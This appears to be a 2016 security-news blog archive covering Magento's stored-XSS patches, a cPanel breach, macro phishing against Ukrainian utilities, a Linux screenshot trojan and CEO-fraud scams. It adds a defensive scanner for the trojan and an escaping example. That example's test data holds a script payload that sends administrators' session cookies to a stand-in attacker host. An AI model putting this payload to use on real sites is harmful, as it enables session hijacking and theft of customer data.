Archive for January 30, 2016

Magento releases update fixing security vulnerabilities

Magento, an e-commerce platform, has released an update addressing a number of security vulnerabilities, including patches for two critical stored cross-site scripting (XSS) issues.

The stored XSS flaws allow attackers to hijack Magento-based websites by taking over administrator sessions, which may result in the theft of sensitive customer data.

The first vulnerability affects almost every version of Magento, Community Edition (CE) and Enterprise Edition (EE) alike, and can be exploited remotely. To exploit it, an attacker only needs to submit an email address containing malicious JavaScript through the public-facing site.

Magento does not sanitize the email field properly and renders it unescaped in the administrator's backend, where the browser executes it. The malicious code can then steal the administrator's session.

Cybersecurity firm Sucuri says: "The buggy snippet is located inside Magento core libraries, more specifically within the administrator's backend. Unless you're behind a WAF or you have a very heavily modified administration panel, you're at risk."

The second bug was discovered in the comments section of the Magento CMS. Because Magento does not filter the request properly, JavaScript code is saved to the Magento database; when an administrator views the stored comment in the backend, the code executes and leads to session hijacking.
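Both flaws have the same shape: a value written by an untrusted user is stored and later rendered into an administrator's page without output encoding. The Python below is an added illustration, not Magento code or Sucuri's proof of concept; the customer records, the script payload and the attacker.invalid host are constructed. It also shows why input validation alone is not a fix: the payload sits in a quoted local part, which RFC 5322 permits, so a syntactic email check lets it through, and only escaping at render time stops it.

```python
import html
import re

# Constructed sample customer records (test data, not from the advisory).
# The second email hides a script payload in a quoted local part, which RFC 5322
# syntax permits, so it survives a syntactic email check.
CUSTOMERS = [
    {"id": 1, "email": "alice@example.com"},
    {"id": 2, "email": '"<script>document.location=\'https://attacker.invalid/?c=\'+document.cookie</script>"@example.com'},
]

# A simplistic syntactic check of the kind that does NOT stop the payload.
NAIVE_EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def passes_naive_validation(email):
    """True if the address looks like local@domain.tld; the payload above passes."""
    return NAIVE_EMAIL.match(email) is not None


def render_row_vulnerable(customer):
    """Mirrors the flaw described above: the stored value is dropped straight
    into the admin page's HTML, so any markup it contains is rendered live."""
    return "<tr><td>{id}</td><td>{email}</td></tr>".format(**customer)


def render_row_hardened(customer):
    """The fix: escape every untrusted value for the HTML context at the point
    where it is rendered, regardless of what validation happened on input."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(str(customer["id"]), quote=True),
        html.escape(customer["email"], quote=True),
    )


def render_admin_table(customers, render_row):
    """Assemble the admin customer grid with the given row renderer."""
    return "<table>" + "".join(render_row(c) for c in customers) + "</table>"


SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(markup):
    """Return True if markup still contains an unescaped <script> tag, i.e. a
    browser would execute it when an administrator opens the page."""
    return SCRIPT_OPEN.search(markup) is not None


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_row_vulnerable), ("hardened", render_row_hardened)):
        page = render_admin_table(CUSTOMERS, renderer)
        print(f"{name}: executes script = {contains_live_script(page)}")
```

The same principle applies to the comment field in the second bug: the stored text is not the problem, the unescaped rendering in the backend is, which is why a WAF in front of the storefront only helps until an attacker finds an input path it does not inspect.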

Besides these two critical vulnerabilities, the update also fixes RSS-based information leaks, weaknesses to brute-force attacks, a lack of form protection on the Admin Login page, and more.

To protect websites from exploitation, apply the latest patch bundle, SUPEE-7405, as soon as possible.

Hack on cPanel exposes customer details

cPanel was hacked this weekend, exposing details of its customers, including their names, contact details, and encrypted passwords.

The breach did not affect payment information, which was kept on a separate system.

The firm advised customers with older passwords to change them, although it considers the likelihood of those passwords being recovered to be low.

"Although current passwords are stored salted and encrypted, we are accelerating our move to stronger password encryption at the same time in order to minimize disruption. In order to safeguard the system, we will force all users with older password encryption to change their passwords," said the company's e-mail.

Although the breach appears fairly minor, customers may be badly affected if attackers make use of the exposed information.

The company has been in business since 1997 and positions itself as one of the most reliable vendors in the web hosting industry.

Phishing attack on Ukrainian electricity utilities

Ukrainian electricity utilities have recently been targeted by a new wave of phishing attacks, following the December attack that cut power to almost 80,000 customers for about six hours.

The current phishing attacks resemble the BlackEnergy attacks of 23 December against Prykarpattya Oblenergo and Kyiv Oblenergo, which caused a large power outage.

Ukraine's national security service has pointed to the Kremlin as the suspected source of the attacks.

In the current campaign, targets received malicious Microsoft Excel (XLS) files whose macros attempt to download and execute the open-source GCat backdoor, a Python tool that uses a Gmail account as its command-and-control channel.

This technique has been used in other attacks as well. According to Robert Lipovsky, a malware researcher at ESET, recipients are urged to enable the macros in the attachment; the macros then download an executable, which gives the attackers the ability to run shell commands and further payloads on the system.

Some of GCat's functionality, such as taking screenshots, keylogging and uploading files, was removed from the source code of the variant used.

The backdoor communicates with its operators through a Gmail account, so its traffic blends in with legitimate webmail and is difficult to detect.

Lipovsky said they were not certain of the role of Russia or any other actor in the attacks.

Many researchers in Ukraine are working on forensics and systems security following the BlackEnergy attacks.

New Linux Trojan spies on users by taking screenshots

In the past week, the Linux.Ekocms.1 trojan has emerged as the latest threat targeting Linux desktops, following the Linux.Encoder ransomware and the XOR DDoS malware, which have already dented Linux's reputation as immune to malware infections.

According to Russian anti-virus company Dr.Web, the trojan is spyware designed to take a screenshot of the user's desktop every 30 seconds. The screenshots are saved to one of two folders; if the folder does not exist, the trojan creates it.

Linux users without an antivirus solution can check for Linux.Ekocms themselves by looking in the following two folders for screengrabs:
- $HOME/$DATA/.mozilla/firefox/profiled
- $HOME/$DATA/.dropbox/DropboxCache

The trojan saves the files in JPEG format, named with the timestamp of the screenshot; if saving as JPEG fails, it falls back to BMP. At regular intervals it uploads the files to a command-and-control (C&C) server through a proxy whose IP address is hard-coded into the trojan. The uploads travel over an encrypted connection, which makes the trojan's network activity harder for analysts to inspect.
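The manual check above can be scripted. The Python below is an added example, not a Dr.Web tool: it walks the two folder names the page lists and reports files whose headers identify them as JPEG or BMP, so a screenshot with no extension is still caught. It assumes that the "$DATA" in the page's paths is an unknown intermediate directory under $HOME, so it tries both the direct path and one level of subdirectory; the fixture built by demo() is constructed test data.

```python
import os
import tempfile

# Folder names the page lists as Linux.Ekocms drop locations, relative to $HOME.
# Assumption (mine): "$DATA" in the page's paths is an unknown intermediate
# directory, so both the direct path and one level of subdirectory are searched.
DROP_DIRS = (
    os.path.join(".mozilla", "firefox", "profiled"),
    os.path.join(".dropbox", "DropboxCache"),
)

JPEG_MAGIC = b"\xff\xd8\xff"   # start of every JPEG file
BMP_MAGIC = b"BM"              # start of every BMP file


def image_kind(path):
    """Return 'jpeg', 'bmp' or None from the file header, ignoring the extension."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(3)
    except OSError:
        return None
    if head.startswith(JPEG_MAGIC):
        return "jpeg"
    if head.startswith(BMP_MAGIC):
        return "bmp"
    return None


def candidate_dirs(home):
    """Yield every location a drop folder could sit at under home."""
    yield from (os.path.join(home, d) for d in DROP_DIRS)
    try:
        entries = os.listdir(home)
    except OSError:
        return
    for entry in entries:
        for d in DROP_DIRS:
            yield os.path.join(home, entry, d)


def find_suspect_screenshots(home):
    """List (path, kind) for JPEG/BMP files found in the Ekocms drop folders under home."""
    hits = []
    for directory in candidate_dirs(home):
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            kind = image_kind(path) if os.path.isfile(path) else None
            if kind:
                hits.append((path, kind))
    return hits


def demo():
    """Build a constructed fixture in a temp dir, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as home:
        drop = os.path.join(home, "data", ".mozilla", "firefox", "profiled")
        os.makedirs(drop)
        # Constructed files named like Unix timestamps, no extension.
        with open(os.path.join(drop, "1454112000"), "wb") as fh:
            fh.write(JPEG_MAGIC + b"\xe0" + b"\x00" * 16)   # JPEG-like header
        with open(os.path.join(drop, "1454112030"), "wb") as fh:
            fh.write(BMP_MAGIC + b"\x00" * 16)               # BMP-like header
        with open(os.path.join(drop, "notes.txt"), "wb") as fh:
            fh.write(b"not an image")                        # must be ignored
        return find_suspect_screenshots(home)


if __name__ == "__main__":
    for path, kind in find_suspect_screenshots(os.path.expanduser("~")):
        print(f"{kind}: {path}")
```

Run it as the affected user so $HOME resolves to the right directory. No hits does not prove a clean system, since a later variant could use other paths; the check only covers the two folders Dr.Web reported.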

Dr.Web's analysts also found an audio recording feature in the code, but it is never activated during the trojan's normal operation. Even so, Linux.Ekocms is an effective reconnaissance tool: the screenshots give attackers an overview of the applications a Linux user relies on daily and the websites they visit.

Cyber Insurer sued after company loses $480K in CEO Fraud

A Texas-based engineering firm, Ameriforge Group Inc., better known as AFGlobal, is suing its cyber insurance provider, Federal Insurance Co., a division of insurance giant Chubb Group, for refusing to cover a $480,000 loss from an email scam that impersonated the firm's chief executive.

AFGlobal says it has documentation showing that scammers impersonating its CEO convinced the company's accountant to wire $480,000 to the Agricultural Bank of China.

According to documents filed with the U.S. District Court in Harris County, Texas, the policy covered up to $3 million, with a $100,000 deductible. The documents indicate that from May 21, 2014 to May 27, 2014, AFGlobal’s director of accounting received a series of emails from someone claiming to be Gean Stalcup, the CEO of AFGlobal.

After the transfer was made, the sender asked for an additional $18 million.

The firm expects its insurer to pay out on the incident; the insurer maintains that the policy does not cover the loss.

CEO Fraud schemes are an increasingly common and costly form of cybercrime. According to the FBI, thieves have stolen nearly $750 million in such scams from more than 7,000 victim companies in the U.S. between October 2013 and August 2015.

In a separate case, the chief financial officer of one of New Zealand's largest tertiary institutions left her job after falling for an email "whaling" scam.

Bronwyn Koroheke, executive director of finance at Te Wananga o Aotearoa, transferred US$79,000 (NZ$118,000) to an offshore bank account after receiving an email that appeared to come from her chief executive, Jim Mather, instructing her to send the money. The email was actually sent by China-based fraudsters running a whaling scam.

To counter such scams, the FBI urges businesses to adopt two-step or two-factor authentication for email where available, and to establish other communication channels, such as telephone calls, to verify significant transactions. Businesses are also advised to exercise restraint when publishing information about employee activities on their websites or through social media.

Source: KrebsOnSecurity